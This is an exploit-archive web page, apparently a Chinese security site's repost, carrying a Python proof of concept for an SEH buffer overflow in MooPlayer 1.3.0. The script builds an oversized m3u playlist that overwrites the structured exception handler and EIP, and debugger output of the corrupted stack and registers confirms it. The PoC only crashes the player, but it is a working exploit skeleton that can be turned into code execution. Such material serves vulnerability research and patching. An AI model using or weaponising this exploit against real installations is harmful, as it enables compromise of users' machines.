MooPlayer 1.3.0 - m3u SEH Buffer Overflow PoC

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

MooPlayer 1.3.0 - m3u SEH Buffer Overflow PoC

来源：@samanL33T 作者：SaMaN 发布时间：2015-02-10

#!/usr/bin/env python

##########################################################################################

# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC

# Date Discovered: 09-02-2015

# Exploit Author: Samandeep Singh ( SaMaN - @samanL33T )

# Vulnerable Software: Moo player 1.3.0

# Software Link: https://mooplayer.jaleco.com/

# Vendor site: https://mooplayer.jaleco.com/

# Version: 1.3.0

# Tested On: Windows XP SP3, Win 7 x86.

##########################################################################################

# -----------------------------------NOTES----------------------------------------------#

##########################################################################################

# After the execution of POC, the SEH chain looks like this:

# 01DDF92C ntdll.76FF71CD

# 01DDFF5C 43434343

# 42424242 *** CORRUPT ENTRY ***

# And the Stack

# 01DDFF44 41414141 AAAA

# 01DDFF48 41414141 AAAA

# 01DDFF4C 41414141 AAAA

# 01DDFF50 41414141 AAAA

# 01DDFF54 41414141 AAAA

# 01DDFF58 41414141 AAAA

# 01DDFF5C 42424242 BBBB Pointer to next SEH record

# 01DDFF60 43434343 CCCC SE handler

# 01DDFF64 00000000 ....

# 01DDFF68 44444444 DDDD

# 01DDFF6C 44444444 DDDD

# 01DDFF70 44444444 DDDD

# And the Registers

# EAX 00000000

# ECX 43434343

# EDX 76FF71CD ntdll.76FF71CD

# EBX 00000000

# ESP 01DDF918

# EBP 01DDF938

# ESI 00000000

# EDI 00000000

# EIP 43434343

head="http://"

buffer=10000

junk="\x41" * 264

nseh = "\x42" * 4

seh = "\x43" * 4

poc = head + junk + nseh + seh

junk1 = "\x44"*(buffer-len(poc))

poc += junk1

file = "mooplay_poc.m3u"

f=open(file,"w")

f.write(head + poc);

f.close();

#SaMaN(@samanL33T)

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告